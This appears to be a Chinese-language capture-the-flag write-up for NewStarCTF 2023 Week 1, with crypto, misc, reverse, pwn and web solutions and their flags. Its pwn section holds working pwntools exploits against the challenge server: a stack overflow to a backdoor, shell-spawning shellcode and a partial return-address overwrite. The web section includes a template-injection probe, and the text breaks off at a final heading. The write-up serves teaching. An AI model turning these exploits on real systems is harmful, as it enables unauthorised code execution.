[NewStarCTF2023]Week1


[NewstarCTF2023]Week1_Official

Crypto

Caesar's Secert

img

flag

flag{ca3s4r's_c1pher_i5_v4ry_3azy}

Fence

img

flag

flag{reordering_the_plaintext#686f8c03}

brainfuck

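def shrinkBFCode(code):
    """Collapse runs of ``+``/``-`` in a Brainfuck program and track the cell each op touches.

    Every maximal run of ``+``/``-`` becomes a single ``'+'`` in the output whose
    signed net delta is recorded in ``cPos2Change``; ``>``/``<`` are dropped and
    folded into the per-op data-pointer offset stored in ``cPos2Vars``.  Every
    other character (``[``, ``]``, ``.``, ``,``, stray comment text, ...) is
    copied through unchanged and also gets an offset entry.

    Args:
        code: Brainfuck source text.

    Returns:
        ``(nCode, cPos2Vars, cPos2Change)``: the shrunken program, a map from index
        in ``nCode`` to the data-pointer offset (relative to the program start) in
        effect for that op, and a map from the index of each emitted ``'+'`` to its
        net change (may be 0 for a run such as ``+-``).
    """
    cPos2Vars = {}    # index in nCode -> data-pointer offset at that op
    cPos2Change = {}  # index in nCode -> net +/- delta of the collapsed run
    varPos = 0        # data-pointer offset relative to the start of the program
    nCode = []
    incVal = 0        # pending delta of the +/- run currently being read
    dataChangeOp = {'+', '-'}

    def flush():
        # Emit the pending +/- run as one '+' annotated with its net delta.
        nonlocal incVal
        cPos2Change[len(nCode)] = incVal
        cPos2Vars[len(nCode)] = varPos
        nCode.append('+')
        incVal = 0

    lc = None
    for c in code:
        # A run of +/- ends when any other character arrives.
        if c not in dataChangeOp and lc in dataChangeOp:
            flush()
        if c == '>':
            varPos += 1
        elif c == '<':
            varPos -= 1
        elif c in dataChangeOp:
            incVal += 1 if c == '+' else -1
        else:
            cPos2Vars[len(nCode)] = varPos
            nCode.append(c)
        lc = c
    # A program that ends in +/- has no terminating op to trigger the flush above;
    # without this the final run was silently dropped.
    if lc in dataChangeOp:
        flush()

    return ''.join(nCode), cPos2Vars, cPos2Change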

def generatePyCode(shellCode: str, pVars: dict[int, int], pChange: dict[int, int]) -> str:
    """Translate a shrunken Brainfuck program (see shrinkBFCode) into Python source.

    The emitted code operates on a list named ``data`` that the caller must define;
    ``.`` becomes ``print(data[x])`` (the numeric cell value, not ``chr``), ``,``
    reads one byte via ``stdin.read(1)`` (``stdin`` is not imported either), ``+``
    applies the collapsed delta from ``pChange`` as ``+=``/``-=``, and ``%`` is a
    non-standard extension emitting ``data[x] %= data[x+1]``.

    Loops are simplified in two ways: a ``[`` ... ``]`` pair enclosing exactly one
    op is rewritten as ``data[x] = 0`` (the ``[-]`` clear idiom), and a non-nested
    loop without ``%`` is unrolled into ``data[v] +=/-= n*data[counter]`` lines
    using the per-cell deltas gathered in ``whileVarCache``.  Nested loops are left
    as plain ``while`` loops.

    Args:
        shellCode: shrunken program from shrinkBFCode.
        pVars: op index -> data-pointer offset (missing indices default to the index).
        pChange: op index -> collapsed +/- delta (missing indices default to 1).

    Returns:
        The generated Python source, one statement per line.

    Raises:
        Exception: on a mismatched bracket.
        IndexError: on a ``]`` with no open ``[`` (``bStacks[-1]`` on an empty list).
        KeyError / ZeroDivisionError: when unrolling a loop whose counter cell is
            never modified (or has net delta 0) inside the body.
    """
    pyCodes = []          # emitted Python lines
    bStacks = []          # open loops as ('[', index of that '[')
    whileVarCache = {}    # '[' index -> {cell offset: net delta applied inside the loop}
    for i, c in enumerate(shellCode):
        # Fall back to the raw index / a unit delta when shrinkBFCode recorded nothing.
        d_pos = i if i not in pVars else pVars[i]
        d_change = 1 if i not in pChange else pChange[i]
        indentLevel = len(bStacks)
        indentStr = ' '*(4*indentLevel)
        if c == '[':
            pyCodes.append('{}while data[{}] != 0:'.format(indentStr, d_pos))
            bStacks.append((c, i))
            whileVarCache[i] = {}
        elif c == ']':
            # NOTE(review): bStacks[-1] raises IndexError on a ']' with no open '['.
            if bStacks[-1][0] != '[':
                raise Exception('miss match of {}] found between {} and {}'.format(bStacks[-1][0], bStacks[-1][1], i))
            cNum = i-bStacks[-1][1]    
            if cNum == 2:
                # '[' + one op + ']': treated as the clear idiom.  The while header and
                # the single body statement are dropped and replaced by 'data[x] = 0'
                # (this assumes the single op was a +/-).
                del pyCodes[-1]
                del pyCodes[-1]
                d_pos_l = i-1 if i-1 not in pVars else pVars[i-1]
                pyCodes.append('{}data[{}] = 0'.format(' '*(4*(indentLevel-1)), d_pos_l))
            whileCode = shellCode[bStacks[-1][1]+1 : i]
            if cNum>2 and '[' not in whileCode and not '%' in whileCode:  # nested loop is a bit complicated, just skip
                # Unroll a flat loop: every other cell touched in the body moves by
                # (its delta / counter delta) * counter, and the counter ends at 0.
                loopCondvar = bStacks[-1][1]
                d_pos_l = loopCondvar if loopCondvar not in pVars else pVars[loopCondvar]
                whileVars = whileVarCache[bStacks[-1][1]]
                # KeyError here means the counter cell was never modified in the body;
                # a net delta of 0 gives ZeroDivisionError below.
                cVarChange = whileVars[d_pos_l]
                # remove statement of same indent
                while len(pyCodes)>0 and pyCodes[-1].startswith(indentStr) and pyCodes[-1][len(indentStr)]!=' ':  
                    pyCodes.pop()
                pyCodes.pop()  # the 'while' header itself
                #del pyCodes[bStacks[-1][1]-i:]
                for vPos, vChange in whileVars.items():
                    if vPos == d_pos_l:
                        continue
                    # True division: the multiplier is a float in the output (e.g. '2.0*data[0]').
                    ctimes = abs(vChange / cVarChange)
                    ctimesStr = '' if ctimes==1 else '{}*'.format(ctimes)
                    cSign = '+' if vChange > 0 else '-'
                    pyCodes.append('{}data[{}] {}= {}data[{}]'.format(' '*(4*(indentLevel-1)), 
                                                                        vPos, cSign,  ctimesStr, d_pos_l))
                pyCodes.append('{}data[{}] = 0'.format(' '*(4*(indentLevel-1)), d_pos_l))
            del whileVarCache[bStacks[-1][1]]
            bStacks.pop()
        elif c == '.':
            pyCodes.append('{}print(data[{}])'.format(indentStr, d_pos))
        elif c == ',':
            pyCodes.append('{}data[{}] = ord(stdin.read(1))'.format(indentStr, d_pos))
        elif c == '+':
            opSign = '-=' if d_change < 0 else '+='
            # Fold a directly preceding 'data[x] = 0' into a plain assignment.
            if pyCodes and pyCodes[-1] == '{}data[{}] = 0'.format(indentStr, d_pos):
                pyCodes[-1] = '{}data[{}] = {}'.format(indentStr, d_pos, d_change)
            else:
                pyCodes.append('{}data[{}] {} {}'.format(indentStr, d_pos, opSign, abs(d_change)))
            if bStacks:
                # Book the net change of this cell against the innermost open loop.
                whileVarCache[bStacks[-1][1]].setdefault(d_pos, 0)
                whileVarCache[bStacks[-1][1]][d_pos] += d_change
        elif c == '-':
            # Only reached for an un-shrunk program: shrinkBFCode emits '+' for every run.
            opSign = '+=' if d_change < 0 else '-='
            if pyCodes and pyCodes[-1] == '{}data[{}] = 0'.format(indentStr, d_pos):
                pyCodes[-1] = '{}data[{}] = {}'.format(indentStr, d_pos, -d_change)
            else:
                pyCodes.append('{}data[{}] {} {}'.format(indentStr, d_pos, opSign, abs(d_change)))
            if bStacks:
                whileVarCache[bStacks[-1][1]].setdefault(d_pos, 0)
                whileVarCache[bStacks[-1][1]][d_pos] -= d_change
        elif c == '%':
            # Non-standard op: reduce the current cell modulo its right neighbour.
            pyCodes.append('{}data[{}] %= data[{}]'.format(indentStr, d_pos, d_pos+1))
    return '\n'.join(pyCodes)

# Brainfuck program recovered from the challenge; every '.' prints the current cell.
shellcode = "++++++++[>>++>++++>++++++>++++++++>++++++++++>++++++++++++>++++++++++++++>++++++++++++++++>++++++++++++++++++>++++++++++++++++++++>++++++++++++++++++++++>++++++++++++++++++++++++>++++++++++++++++++++++++++>++++++++++++++++++++++++++++>++++++++++++++++++++++++++++++<<<<<<<<<<<<<<<<-]>>>>>>>++++++.>----.<-----.>-----.>-----.<<<-.>>++..<.>.++++++.....------.<.>.<<<<<+++.>>>>+.<<<+++++++.>>>+.<<<-------.>>>-.<<<+.+++++++.--..>>>>---.-.<<<<-.+++.>>>>.<<<<-------.+.>>>>>++."
# Collapse the +/- runs and resolve the data pointer per op, then emit Python
# statements over a `data` list (the emitted code does not define `data` itself).
shrinkCode, pVars, pChange = shrinkBFCode(shellcode)
pyCode = generatePyCode(shrinkCode, pVars, pChange)
print(pyCode)

解密得到

# Python emitted by generatePyCode for the Brainfuck program above (machine output,
# not hand-written).  It is not runnable as-is: `data` is never defined (use e.g.
# `data = [0] * 17`), the unrolled set-up loop uses float multipliers (`2.0*data[0]`)
# so the cells turn into floats, and each '.' became `print(data[i])`, which shows the
# numeric cell value.  Printing `chr(int(data[i]))` instead, without a newline,
# reproduces the flag given below.
data[0] += 8
data[2] += 2.0*data[0]
data[3] += 4.0*data[0]
data[4] += 6.0*data[0]
data[5] += 8.0*data[0]
data[6] += 10.0*data[0]
data[7] += 12.0*data[0]
data[8] += 14.0*data[0]
data[9] += 16.0*data[0]
data[10] += 18.0*data[0]
data[11] += 20.0*data[0]
data[12] += 22.0*data[0]
data[13] += 24.0*data[0]
data[14] += 26.0*data[0]
data[15] += 28.0*data[0]
data[16] += 30.0*data[0]
data[0] = 0
data[7] += 6
print(data[7])
data[8] -= 4
print(data[8])
data[7] -= 5
print(data[7])
data[8] -= 5
print(data[8])
data[9] -= 5
print(data[9])
data[6] -= 1
print(data[6])
data[8] += 2
print(data[8])
print(data[8])
print(data[7])
print(data[8])
data[8] += 6
print(data[8])
print(data[8])
print(data[8])
print(data[8])
print(data[8])
data[8] -= 6
print(data[8])
print(data[7])
print(data[8])
data[3] += 3
print(data[3])
data[7] += 1
print(data[7])
data[4] += 7
print(data[4])
data[7] += 1
print(data[7])
data[4] -= 7
print(data[4])
data[7] -= 1
print(data[7])
data[4] += 1
print(data[4])
data[4] += 7
print(data[4])
data[4] -= 2
print(data[4])
print(data[4])
data[8] -= 3
print(data[8])
data[8] -= 1
print(data[8])
data[4] -= 1
print(data[4])
data[4] += 3
print(data[4])
print(data[8])
data[4] -= 7
print(data[4])
data[4] += 1
print(data[4])
data[9] += 2
print(data[9])

简单修改一下输出(先初始化 data = [0]*17,再把每个 print(data[i]) 改成输出 chr(int(data[i])))运行即可得到
img
或者CTF在线工具
img

flag

flag{Oiiaioooooiai#b7c0b1866fe58e12}

Vigenère

Vigenere Solver
img

flag

flag{la_c1fr4_del_5ign0r_giovan_batt1st4_b3ll5s0}

babyrsa

from Crypto.Util.number import *
import binascii
import gmpy2
import rsa
from factordb.factordb import FactorDB
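n = 17290066070594979571009663381214201320459569851358502368651245514213538229969915658064992558167323586895088933922835353804055772638980251328261
e = 65537
# NOTE(review): FactorDB is a public third-party service -- the modulus is sent over
# the network.  Fine for a CTF value, never for a client's key material.
a = FactorDB(n)
a.connect()
fac = a.get_factor_list()
# FactorDB can answer with a partial factorisation (composite cofactors); phi computed
# from such a list is wrong and the "decryption" below silently yields garbage, so
# insist that the returned factors multiply back to n.
product = 1
for p in fac:
    product *= p
if product != n:
    raise ValueError("FactorDB returned an incomplete factorisation of n")
# phi(n) = prod over distinct primes of p^(k-1) * (p - 1); this also covers repeated
# factors, which a plain product of (p - 1) would get wrong.
phi_n = 1
for p in set(fac):
    phi_n *= (p - 1) * p ** (fac.count(p) - 1)
d = gmpy2.invert(e, phi_n)
c = 14322038433761655404678393568158537849783589481463521075694802654611048898878605144663750410655734675423328256213114422929994037240752995363595
m = gmpy2.powmod(c, d, n)
# long_to_bytes copes with an odd number of hex digits; unhexlify(hex(m)[2:]) raises on it.
print(long_to_bytes(int(m)))
#flag{us4_s1ge_t0_cal_phI}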

flag

flag{us4_s1ge_t0_cal_phI}

babyxor

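enc = 'e9e3eee8f4f7bffdd0bebad0fcf6e2e2bcfbfdf6d0eee1ebd0eabbf5f6aeaeaeaeaeaef2'
cipher_hex = list(bytes.fromhex(enc))  # one int per ciphertext byte
#print(cipher_hex)
# Single-byte XOR: try every key (range(255) used to skip key 255) and stop at
# the first candidate whose plaintext contains 'flag'.
for key in range(256):
    flag = ''.join(chr(c ^ key) for c in cipher_hex)
    #print(flag)
    if 'flag' in flag:
        print(f'key={key}\n{flag}')
        break
#flag{x0r_15_symm3try_and_e4zy!!!!!!}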

flag

flag{x0r_15_symm3try_and_e4zy!!!!!!}

small d

e 与 n 同量级(e 接近 n),说明私钥 d 很小,直接考虑维纳攻击(Wiener's attack,适用于 d < n^(1/4)/3 的情形)
github上找个脚本

import gmpy2
import libnum

def continuedFra(x, y):
    """Return the continued-fraction expansion of x/y as a list of partial quotients.

    Runs the Euclidean algorithm: each step records ``x // y`` and continues with
    ``(y, x % y)`` until the remainder is zero.

    :param x: numerator
    :param y: denominator
    :return: partial quotients ``[a0, a1, ...]``; empty when ``y == 0``
    """
    quotients = []
    while y != 0:
        q, r = divmod(x, y)
        quotients.append(q)
        x, y = y, r
    return quotients
def gradualFra(cf):
    """Evaluate the convergent of a finite continued fraction.

    Folds the partial quotients from the innermost term outward.  Mind the return
    order: the first element is the *denominator* and the second the *numerator*
    of ``cf[0] + 1/(cf[1] + 1/(...))``; callers such as wienerAttack rely on this
    ``(denominator, numerator)`` order.

    :param cf: list of partial quotients
    :return: ``(den, num)`` with ``num/den`` the value of the continued fraction
             (``(0, 1)`` for an empty list)
    """
    den, num = 0, 1
    for term in reversed(cf):
        den, num = num, term * num + den
    return den, num
def solve_pq(a, b, c):
    """Return the two roots of ``a*x^2 + b*x + c = 0`` using an integer square root.

    The discriminant's root is floored (``gmpy2.isqrt``), so the result is exact
    only when the discriminant is a perfect square; callers verify by multiplying
    the roots back.  For ``x^2 - (p+q)x + pq`` pass ``b = -(p+q)`` to get ``p, q``.

    :param a: coefficient of x^2
    :param b: coefficient of x
    :param c: constant term (pq)
    :return: ``(larger_root, smaller_root)``
    """
    disc = b * b - 4 * a * c
    root = gmpy2.isqrt(disc)
    denom = 2 * a
    return (root - b) // denom, (-root - b) // denom
def getGradualFra(cf):
    """Return every convergent of the continued fraction, in order.

    Element ``i`` is ``gradualFra(cf[:i + 1])``, the convergent built from the
    first ``i + 1`` partial quotients, in that function's
    ``(denominator, numerator)`` order.

    :param cf: list of partial quotients
    :return: list of ``(den, num)`` pairs, one per non-empty prefix of ``cf``
    """
    return [gradualFra(cf[:length]) for length in range(1, len(cf) + 1)]


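def wienerAttack(e, n):
    """Recover a small RSA private exponent d from (e, n) with Wiener's attack.

    Walks the convergents k/d of e/n (getGradualFra yields them as ``(d, k)``).
    For each candidate with ``k | e*d - 1`` the implied ``phi = (e*d - 1) / k``
    gives ``p + q = n - phi + 1``; the candidate is accepted when the roots of
    ``x^2 - (p + q)x + n`` multiply back to ``n``.  Classically this succeeds
    when ``d < n**0.25 / 3``.

    :param e: public exponent
    :param n: modulus
    :return: the private exponent d, or ``None`` if no convergent works
    """
    cf = continuedFra(e, n)
    for d, k in getGradualFra(cf):
        if k == 0:
            continue
        if (e * d - 1) % k != 0:
            continue
        phi = (e * d - 1) // k
        # x^2 - (p+q)x + pq = 0: the linear coefficient is -(p+q).  Passing +(p+q)
        # (as before) returned -p and -q; p*q == n still held, but the roots were wrong.
        p, q = solve_pq(1, -(n - phi + 1), n)
        if p * q == n:
            return d
    return None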

# Public parameters from the challenge: e is about as large as n, the hallmark of a small d.
n = 19873634983456087520110552277450497529248494581902299327237268030756398057752510103012336452522030173329321726779935832106030157682672262548076895370443461558851584951681093787821035488952691034250115440441807557595256984719995983158595843451037546929918777883675020571945533922321514120075488490479009468943286990002735169371404973284096869826357659027627815888558391520276866122370551115223282637855894202170474955274129276356625364663165723431215981184996513023372433862053624792195361271141451880123090158644095287045862204954829998614717677163841391272754122687961264723993880239407106030370047794145123292991433
e = 8614531087131806536072176126608505396485998912193090420094510792595101158240453985055053653848556325011409922394711124558383619830290017950912353027270400567568622816245822324422993074690183971093882640779808546479195604743230137113293752897968332220989640710311998150108315298333817030634179487075421403617790823560886688860928133117536724977888683732478708628314857313700596522339509581915323452695136877802816003353853220986492007970183551041303875958750496892867954477510966708935358534322867404860267180294538231734184176727805289746004999969923736528783436876728104351783351879340959568183101515294393048651825
c = 6755916696778185952300108824880341673727005249517850628424982499865744864158808968764135637141068930913626093598728925195859592078242679206690525678584698906782028671968557701271591419982370839581872779561897896707128815668722609285484978303216863236997021197576337940204757331749701872808443246927772977500576853559531421931943600185923610329322219591977644573509755483679059951426686170296018798771243136530651597181988040668586240449099412301454312937065604961224359235038190145852108473520413909014198600434679037524165523422401364208450631557380207996597981309168360160658308982745545442756884931141501387954248
# Wiener's attack recovers d from the convergents of e/n.  If it returns None
# (d not small enough), pow() below fails on the None exponent.
d = wienerAttack(e, n)
m = pow(c, d, n)
plaintext = libnum.n2s(m)
print(plaintext.decode())
#flag{learn_some_continued_fraction_technique#dc16885c}

flag

flag{learn_some_continued_fraction_technique#dc16885c}

babyencoding

part 1 of flag: ZmxhZ3tkYXp6bGluZ19lbmNvZGluZyM0ZTBhZDQ=
part 2 of flag: MYYGGYJQHBSDCZJRMQYGMMJQMMYGGN3BMZSTIMRSMZSWCNY=
part 3 of flag: =8S4U,3DR8SDY,C`S-F5F-C(S,S<R-C`Q9F8S87T`

part 1 base64: flag{dazzling_encoding#4e0ad4
part 2 base32: f0ca08d1e1d0f10c0c7afe422fea7
part 3 uuencode: c55192c992036ef623372601ff3a}
img

flag

flag{dazzling_encoding#4e0ad4f0ca08d1e1d0f10c0c7afe422fea7c55192c992036ef623372601ff3a}

Affine

仿射密码

def egcd(a, b):
    """Extended Euclid: return ``(g, x, y)`` with ``g = gcd(a, b)`` and ``a*x + b*y == g``.

    Recursive formulation; the base case ``a == 0`` yields ``(b, 0, 1)``.
    """
    if a == 0:
        return b, 0, 1
    g, y1, x1 = egcd(b % a, a)
    # Back-substitute: the coefficients found for (b % a, a) become those for (a, b).
    return g, x1 - (b // a) * y1, y1


def modinv(a, m):
    """Return the inverse of ``a`` modulo ``m`` (in ``[0, m)``).

    Raises ``Exception`` when ``gcd(a, m) != 1``, i.e. no inverse exists.
    """
    g, x, _ = egcd(a, m)
    if g == 1:
        return x % m
    raise Exception('modular inverse does not exist')

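modulus = 256
enc = bytes.fromhex(
    'dd4388ee428bdddd5865cc66aa5887ffcca966109c66edcca920667a88312064')
#print(enc)
# Affine cipher over bytes: c = (key_0 * p + key_1) mod 256, so p = key_0^-1 * (c - key_1).
# Only odd key_0 values are invertible mod 256; the rest raise in modinv and are skipped.
# The key space is 128 * 256 candidates, so plain brute force is enough.
for key_0 in range(256):
    try:
        inv_key_0 = modinv(key_0, modulus)
    except Exception:  # was a bare except, which also swallowed KeyboardInterrupt
        continue

    for key_1 in range(256):
        decrypted = bytes([(inv_key_0 * (c - key_1)) % modulus for c in enc])
        if b'flag{' in decrypted:
            print("Key found:", key_0, key_1)
            print("Decrypted flag:", decrypted)
#Key found: 17 23
#Decrypted flag: b'flag{4ff1ne_c1pher_i5_very_3azy}'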

flag

flag{4ff1ne_c1pher_i5_very_3azy}

babyaes

from Crypto.Cipher import AES
import os
from flag import flag
from Crypto.Util.number import *


def pad(data):
    """Right-pad ``data`` with NUL bytes to 16 bytes; longer input is returned unchanged.

    This is not PKCS#7: a plaintext that itself ends in NUL bytes cannot be
    unpadded unambiguously, and input longer than 16 bytes is not padded at all.
    """
    missing = 16 - len(data)
    return data + b'\x00' * missing


def main():
    """Encrypt the padded flag under AES-256-CBC and print a leaky hint plus the ciphertext.

    The 32-byte key is one 16-byte random value repeated, and the printed number
    ``bytes_to_long(key) ^ bytes_to_long(iv) ^ 1`` overlays the 16-byte iv on the
    low half of the key only: its high 16 bytes are the key half in the clear and
    its low 16 bytes are ``key_half ^ iv``.  Anyone reading the output can thus
    recover key and iv and decrypt the flag.
    """
    padded_flag = pad(flag)
    half = os.urandom(16)
    key = half * 2        # only 128 bits of entropy in a 256-bit key
    iv = os.urandom(16)
    print(bytes_to_long(key) ^ bytes_to_long(iv) ^ 1)
    cipher = AES.new(key, AES.MODE_CBC, iv)
    print(cipher.encrypt(padded_flag))


if __name__ == "__main__":  # only run the challenge when executed as a script
    main()
# 3657491768215750635844958060963805125333761387746954618540958489914964573229
# b'>]\xc1\xe5\x82/\x02\x7ft\xf1B\x8d\n\xc1\x95i'

搓个脚本

from Crypto.Cipher import AES
from Crypto.Util.number import *

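a = 3657491768215750635844958060963805125333761387746954618540958489914964573229
enc = b'>]\xc1\xe5\x82/\x02\x7ft\xf1B\x8d\n\xc1\x95i'
# The leak is bytes_to_long(key) ^ bytes_to_long(iv) ^ 1 with a 32-byte key and a
# 16-byte iv: the iv overlaps only the low 16 bytes, so after undoing the ^ 1 the
# high 16 bytes are the key half verbatim and the low 16 bytes are key_half ^ iv.
# The fixed 32-byte width keeps any leading zero bytes that long_to_bytes() would
# otherwise drop -- copy-pasting the printed bytes by hand silently loses them.
leak = long_to_bytes(a ^ 1, 32)
key_half = leak[:16]
iv = bytes(x ^ y for x, y in zip(leak[16:], key_half))
key = key_half * 2  # the challenge builds the key as os.urandom(16) * 2
print(key_half)
print(iv)

aes = AES.new(key, AES.MODE_CBC, iv)
dec_flag = aes.decrypt(enc)
print(dec_flag)
#b'\x08\x16\x11%\xa0\xa6\xc5\xcb^\x02\x99NF`\xea,'
#b'\xe3Z\x19Ga>\x07\xcc\xd1\xa1X\x01c\x11\x16\x00'
#b'firsT_cry_Aes\x00\x00\x00'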

flag

flag{firsT_cry_Aes}

Misc

CyberChef's Secret

img

flag

flag{Base_15_S0_Easy_^_^}

空白格

whitespace
img

flag

flag{w3_h4v3_to0_m4ny_wh1t3_sp4ce_2a5b4e04}

机密图片

扫码的结果不对,应该有隐写
运用工具StegSolver
img
img

flag

flag{W3lc0m3_t0_N3wSt4RCTF_2023_7cda3ece}

隐秘的眼睛

SilentEye直接梭
img

flag

flag{R0ck1ng_y0u_63b0dc13a591}

流量!鲨鱼!

wireshark打开,大略看一下http,200 OK包很可疑
img
img
Wm14aFozdFhjbWt6TldnMGNtdGZNWE5mZFRVelpuVnNYMkkzTW1FMk1EazFNemRsTm4wSwo=
应该是base64;解码一次后看到熟悉的 Zmxh(即 "flag" 的 base64 前缀),就猜到要再 base64 解码一次
img

flag

flag{Wri35h4rk_1s_u53ful_b72a609537e6}

压缩包们

修复文件头,修复成功后后缀名改成.zip解压
img
flag.zip提示损坏
img
继续修复
img
或者你如果是高贵的bandizip pro用户
img
注意到flag.zip内有一段base64密文
解密出来是I like six-digit numbers because they are very concise and easy to remember.
img
应该是提示flag.zip的解压密码是六位数字,密码232311
img

flag

flag{y0u_ar3_the_m4ter_of_z1111ppp_606a4adc}

Reverse

easy_RE

img
img

flag

flag{welc0me_to_rev3rse!!}

Segments

shift+F7
img
手动过滤一下,修改格式得到flag

flag

flag{You_ar3_g0od_at_f1nding_ELF_segments_name}

upx -d 脱壳
img

exp

enc = 'gmbh|D1ohsbuv2bu21ot1oQb332ohUifG2stuQ[HBMBYZ2fwf2~'
# Every character was shifted up by one code point; shift each one back down.
flag = ''.join(chr(ord(ch) - 1) for ch in enc)
print(flag)

flag

flag{C0ngratu1at10ns0nPa221ngTheF1rstPZGALAXY1eve1}

ELF

encode加密完标准base64
img
img
先把密文base64解码成hex
img

exp

enc = [0x56, 0x5c, 0x51, 0x57, 0x6b, 0x74, 0x20, 0x8f, 0x24, 0x5f, 
       0x65, 0x8f, 0x27, 0x5e, 0x5f, 0x67, 0x8f, 0x67, 0x58, 0x51, 
       0x27, 0x8f, 0x75, 0x7c, 0x76, 0x8f, 0x21, 0x63, 0x2f, 0x6d]
# Each byte was produced as (p ^ 0x20) + 16; undo it in the opposite order.
# Parenthesised on purpose: `-` binds tighter than `^`, so `b - 16 ^ 0x20` is the same thing.
flag = ''.join(chr((b - 16) ^ 0x20) for b in enc)
print(flag)
#flag{D0_4ou_7now_wha7_ELF_1s?}

flag

flag{D0_4ou_7now_wha7_ELF_1s?}

AndroXor

jadx打开,循环异或
img

exp

enc = [14, '\r', 17, 23, 2, 'K', 'I', '7', ' ', 30, 20, 'I', '\n', 2, '\f', '>', '(', '@', 11, '\'', 'K', 'Y', 25, 'A', '\r']
key = 'happyx3'
# jadx renders the byte array as a mix of ints and one-character strings;
# normalise each element to an int, then XOR with the repeating key.
key_ascii = [ord(char) for char in key]
flag = ''.join(
    chr((ord(v) if isinstance(v, str) else v) ^ key_ascii[i % len(key_ascii)])
    for i, v in enumerate(enc)
)
print(flag)
#flag{3z_And0r1d_X0r_x1x1}

flag

flag{3z_And0r1d_X0r_x1x1}

Endian

还是循环异或;密钥 0x12345678 在内存中按小端序存放,所以逐字节的异或因子是 [0x78,0x56,0x34,0x12]
img
shift+E提取出array
img

exp

enc = [
  0x1E, 0x3A, 0x55, 0x75, 0x03, 0x3A, 0x58, 0x7B, 0x0C, 0x22, 
  0x58, 0x4D, 0x3D, 0x38, 0x50, 0x7B, 0x19, 0x38, 0x6B, 0x73, 
  0x05]
key = [0x78,0x56,0x34,0x12]  # 0x12345678 as laid out in memory (little-endian)
# Repeating-key XOR: byte i is combined with key[i % 4].
flag = ''.join(chr(byte ^ key[idx % len(key)]) for idx, byte in enumerate(enc))
print(flag)
#flag{llittl_Endian_a}

flag

flag{llittl_Endian_a}

lazy_activity

非预期

img

正常解法

jadx打开有个flagactivity进程应该是点10000次出flag
img
打开模拟器app内提示'Where is my flag? Try to start another Activity.'
那就利用模拟器的adb工具

adb shell
su
am start -n com.droidlearn.activity_travel/.FlagActivity

img
模拟器弹出这个界面
img
鼠标连点器或者写python脚本模拟点击就行
网上随便找的脚本

import pyautogui as pd
import time
pd.FAILSAFE = True  # pyautogui's abort switch: fling the pointer into a screen corner to stop
 
# Three seconds to move the pointer over the button that has to be hammered.
time.sleep(3)
# 100000 clicks at the current pointer position, as fast as pyautogui allows
# (the decompiled activity wants on the order of 10000 presses).
pd.click(clicks=100000, interval=0.0001)
# pyautogui.click(x, y, clicks=2, interval=0.5, button='right', duration=0.2):
# position, number of clicks, delay between clicks, button (left by default), move duration

img

flag

flag{Act1v1ty_!s_so00oo0o_Impor#an#}

EzPE

打不开,头文件被修改了
img
随便找个exe文件复制过来fix一下
img
简单的异或
img

exp

enc = [
  0x0A, 0x0C, 0x04, 0x1F, 0x26, 0x6C, 0x43, 0x2D, 0x3C, 0x0C, 
  0x54, 0x4C, 0x24, 0x25, 0x11, 0x06, 0x05, 0x3A, 0x7C, 0x51, 
  0x38, 0x1A, 0x03, 0x0D, 0x01, 0x36, 0x1F, 0x12, 0x26, 0x04, 
  0x68, 0x5D, 0x3F, 0x2D, 0x37, 0x2A, 0x7D]
# The encoder chained each byte with its index and the *plaintext* of its successor
# (c[i] = p[i] ^ i ^ p[i+1]); the last byte is untouched.  Walk backwards so that
# enc[idx + 1] already holds the decoded byte when enc[idx] is undone (in place).
for idx in reversed(range(len(enc) - 1)):
    enc[idx] ^= idx ^ enc[idx + 1]
flag = ''.join(map(chr, enc))
print(flag)
#flag{Y0u_kn0w_what_1s_PE_File_F0rmat}

flag

flag{Y0u_kn0w_what_1s_PE_File_F0rmat}

PWN

ret2text

栈溢出

exp

from pwn import *
p = remote("node4.buuoj.cn", 25617)
elf = ELF('./ret2text')
backdoor = elf.symbols['backdoor']
# 40 bytes fill the buffer and saved rbp, then the saved return address is
# swapped for the backdoor's address (usable as-is only because the binary is
# presumably not PIE -- the static symbol is sent unadjusted).
payload = b'a' * 40 + p64(backdoor)
p.sendline(payload)
p.interactive()

newstar_shop

看附件知道是个整型溢出
shop 里面的 money 是 unsigned int(无符号整数),但是 don't choose 里面的 money 是 int(有符号整数),两处类型不一致,因此可以整数溢出:先让它变成负数,再返回购买。
依次输入1212313
img

ezshellcode

有个read
img
看看buf
img
buf 前面先填一段 '\x90'(nop 滑板),后面接 shellcraft.sh() 生成的 shellcode

from pwn import *

banary = "./ezshellcode"
elf = ELF(banary)
ip = 'node4.buuoj.cn'
port = 25641
local = 0
io = process(banary) if local else remote(ip, port)

# arch must be set before asm() so shellcraft emits x86-64 code.
context(log_level='debug', os='linux', arch='amd64')
#context(log_level = 'debug', os = 'linux', arch = 'i386')

# 16 bytes of NOP padding ahead of an execve("/bin/sh") stub; the buffer is
# presumably executed directly, so landing anywhere in the padding slides into the stub.
sh = shellcraft.sh()
payload = b'\x90' * (0x8 + 8) + asm(sh)
io.send(payload)
io.interactive()

img

random

有个随机数,直接调用
img

from pwn import *

banary = "./pwn"
elf = ELF(banary)
ip = 'node4.buuoj.cn'
port = 26831
local = 0
io = process(banary) if local else remote(ip, port)

context(log_level='debug', os='linux', arch='amd64')
#context(log_level = 'debug', os = 'linux', arch = 'i386')

# The target presumably seeds with srand(time(0)); replaying the same glibc rand()
# stream locally predicts its "random" number.  This only works when our clock and
# the server's agree to the second and both sides use glibc's rand().
clibc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
clibc.srand(clibc.time(0))
guess = clibc.rand()
io.sendlineafter("number?\n", str(guess))
io.interactive()

pieee

PIE保护
img
看看buf在栈中位置
img
填满 buf 的 0x28 字节后,只覆盖返回地址的最低一个字节为 0x6c(PIE 只随机化页基址,地址的低 12 位不变,所以单字节覆写就能跳到同一页内的目标)
img

from pwn import *

banary = "./pie"

elf = ELF(banary)
ip = 'node4.buuoj.cn'
port = 26955
local = 0
io = process(banary) if local else remote(ip, port)

context(log_level='debug', os='linux', arch='amd64')
#context(log_level = 'debug', os = 'linux', arch = 'i386')

# Partial overwrite: 0x28 bytes reach the saved return address, then only its
# lowest byte is replaced with 0x6c.  With PIE the load base is randomised but
# the low 12 bits of every code address are fixed, so a one-byte patch redirects
# execution to the target as long as it shares the remaining bits with the
# original return site.
payload = b'a' * 0x28 + b'\x6c'
io.send(payload)
io.interactive()

img

web

ErrorFlask

随便传两个参数
http://236f6195-02b3-4823-a05d-a72a6fb2080a.node4.buuoj.cn:81/?number1={{%201+1%20}}&number2=1
img

flag

flag{Y0u_@re_3enset1ve_4bout_deb8g}

Begin of HTTP

